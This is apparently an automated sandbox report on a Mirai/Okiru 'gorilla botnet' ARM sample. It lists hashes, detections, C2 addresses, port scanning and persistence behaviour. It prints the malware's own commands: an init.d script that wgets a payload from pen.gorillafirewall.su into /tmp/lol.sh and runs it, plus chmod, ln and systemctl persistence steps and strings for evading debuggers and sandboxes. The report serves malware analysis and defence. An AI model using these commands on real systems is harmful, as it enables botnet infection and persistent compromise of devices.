Linux Analysis Report
arm7.nn.elf

Overview

General Information

Sample name: arm7.nn.elf
Analysis ID: 1522876
MD5: ad9e98b3008479ceed4cfe9affdfcd84
SHA1: 139445315ca6810fd35d70b9226e2f685c7ad46f
SHA256: 4d38c66f9c89f37059f80311d91e5d60f58befcfea7151f350b706e377d624d3
Tags: elfpen-gorillafirewall-suuser-JAMESWT_MHT
Infos:

Detection

Mirai, Okiru
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: arm7.nn.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: arm7.nn.elf ReversingLabs: Detection: 47%
Found strings indicative of a multi-platform dropper
Source: arm7.nn.elf String: Found And Killed Process: PID=%d, Realpath=%s7815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)/fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt487154914:1553<41<515791446<614561;814994;8153;148;14<5which gdb > /dev/null 2>&1Debugger (gdb) detected. Exiting. gorilla botnet didnt like this honeypot....which lldb > /dev/null 2>&1Debugger (lldb) detected. Exiting. gorilla botnet didnt like this honeypot....which dtrace > /dev/null 2>&1Debugger (dtrace) detected. Exiting. gorilla botnet didnt like this honeypot....which truss > /dev/null 2>&1Debugger (truss) detected. Exiting. gorilla botnet didnt like this honeypot....which ptrace > /dev/null 2>&1Debugger (ptrace) detected. Exiting. gorilla botnet didnt like this honeypot....LD_PRELOADSandbox detected (LD_PRELOAD). Exiting. gorilla botnet didnt like this honeypot....LD_LIBRARY_PATHSandbox detected (LD_LIBRARY_PATH). Exiting. gorilla botnet didnt like this honeypot....LD_AUDITSandbox detected (LD_AUDIT). Exiting. gorilla botnet didnt like this honeypot..../proc/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..../etc/motdw%s

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.14:49690 -> 45.202.35.64:199
Source: global traffic TCP traffic: 192.168.2.14:41262 -> 154.216.17.220:38241
Source: global traffic TCP traffic: 192.168.2.14:57872 -> 91.92.246.113:38241
Source: global traffic TCP traffic: 192.168.2.14:40606 -> 93.123.85.166:38241
Sample listens on a socket
Source: /tmp/arm7.nn.elf (PID: 5513) Socket: 0.0.0.0:38241 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: unknown TCP traffic detected without corresponding DNS query: 45.202.35.64
Source: profile.12.dr, inittab.12.dr, bootcmd.12.dr, arm7.nn.elf.32.dr, mybinary.12.dr, custom.service.12.dr String found in binary or memory: http://pen.gorillafirewall.su/

System Summary
barindex
Contains symbols with names commonly found in malware
Source: ELF static info symbol of initial sample Name: attack.c
Source: ELF static info symbol of initial sample Name: attack_get_opt_int
Source: ELF static info symbol of initial sample Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample Name: attack_gre.c
Source: ELF static info symbol of initial sample Name: attack_gre_eth
Source: ELF static info symbol of initial sample Name: attack_gre_ip
Source: ELF static info symbol of initial sample Name: attack_init
Source: ELF static info symbol of initial sample Name: attack_parse
Source: ELF static info symbol of initial sample Name: attack_start
Source: ELF static info symbol of initial sample Name: attack_std
Sample and/or dropped files contains symbols with suspicious names
Source: arm7.nn.elf ELF static info symbol of initial sample: __gnu_unwind_execute
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: Found And Killed Process: PID=%d, Realpath=%s7815351681972surf2/proc/self/exe/proc/%s/exe/.(deleted)/fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt487154914:1553<41<515791446<6145
Sample tries to kill a process (SIGKILL)
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 794, result: successful Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 888, result: successful Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 1659, result: successful Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 3212, result: successful Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 3218, result: successful Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5515) SIGKILL sent: pid: 5520, result: successful Jump to behavior
Source: classification engine Classification label: mal96.spre.troj.evad.linELF@0/11@0/0

Persistence and Installation Behavior
barindex
Sample tries to persist itself using /etc/profile
Source: /tmp/arm7.nn.elf (PID: 5513) File: /etc/profile Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/arm7.nn.elf (PID: 5513) File: /etc/rc.local Jump to behavior
Source: /usr/bin/ln (PID: 5538) File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinary Jump to behavior
Source: /usr/bin/ln (PID: 5563) File: /etc/rc.d/S99arm7.nn.elf -> /etc/init.d/arm7.nn.elf Jump to behavior
Sample tries to set files in /etc globally writable
Source: /tmp/arm7.nn.elf (PID: 5513) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5532) File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5549) File: /etc/init.d/arm7.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/arm7.nn.elf (PID: 5517) Shell command executed: /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5526) Shell command executed: /bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5533) Shell command executed: /bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5539) Shell command executed: /bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5544) Shell command executed: /bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5550) Shell command executed: /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" Jump to behavior
Source: /tmp/arm7.nn.elf (PID: 5556) Shell command executed: /bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1" Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 5532) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinary Jump to behavior
Source: /bin/sh (PID: 5549) Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm7.nn.elf Jump to behavior
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 5555) Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /bin/sh (PID: 5519) Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service Jump to behavior
Sample tries to set the executable flag
Source: /tmp/arm7.nn.elf (PID: 5513) File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5532) File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 5549) File: /etc/init.d/arm7.nn.elf (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes shell script file to disk with an unusual file extension
Source: /tmp/arm7.nn.elf (PID: 5513) Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinary Jump to dropped file
Source: /tmp/arm7.nn.elf (PID: 5513) Writes shell script file to disk with an unusual file extension: /etc/rc.local Jump to dropped file
Source: /bin/sh (PID: 5539) Writes shell script file to disk with an unusual file extension: /etc/init.d/arm7.nn.elf Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /tmp/arm7.nn.elf (PID: 5513) File: /etc/init.d/mybinary Jump to dropped file
Source: /bin/sh (PID: 5539) File: /etc/init.d/arm7.nn.elf Jump to dropped file
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/arm7.nn.elf (PID: 5513) Queries kernel information via 'uname': Jump to behavior
Source: arm7.nn.elf, 5513.1.00007ffcbc0e6000.00007ffcbc107000.rw-.sdmp Binary or memory string: /tmp/qemu-open.OfnRF3
Source: arm7.nn.elf, 5513.1.000055c59cf6e000.000055c59d0bc000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm7.nn.elf, 5513.1.00007ffcbc0e6000.00007ffcbc107000.rw-.sdmp Binary or memory string: U/tmp/qemu-open.OfnRF3:
Source: arm7.nn.elf, 5513.1.00007ffcbc0e6000.00007ffcbc107000.rw-.sdmp Binary or memory string: pIx86_64/usr/bin/qemu-arm/tmp/arm7.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.nn.elf
Source: arm7.nn.elf, 5513.1.000055c59cf6e000.000055c59d0bc000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm7.nn.elf, 5513.1.00007ffcbc0e6000.00007ffcbc107000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: arm7.nn.elf, type: SAMPLE
Yara detected Okiru
Source: Yara match File source: arm7.nn.elf, type: SAMPLE
Source: Yara match File source: 5513.1.00007f321c017000.00007f321c030000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: arm7.nn.elf PID: 5513, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: arm7.nn.elf, type: SAMPLE
Yara detected Okiru
Source: Yara match File source: arm7.nn.elf, type: SAMPLE
Source: Yara match File source: 5513.1.00007f321c017000.00007f321c030000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: arm7.nn.elf PID: 5513, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
154.216.17.220
 unknown Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo true
45.202.35.64
 unknown Seychelles
139086 ONL-HKOCEANNETWORKLIMITEDHK false
91.92.246.113
 unknown Bulgaria
34368 THEZONEBG true
93.123.85.166
 unknown Bulgaria
43561 NET1-ASBG true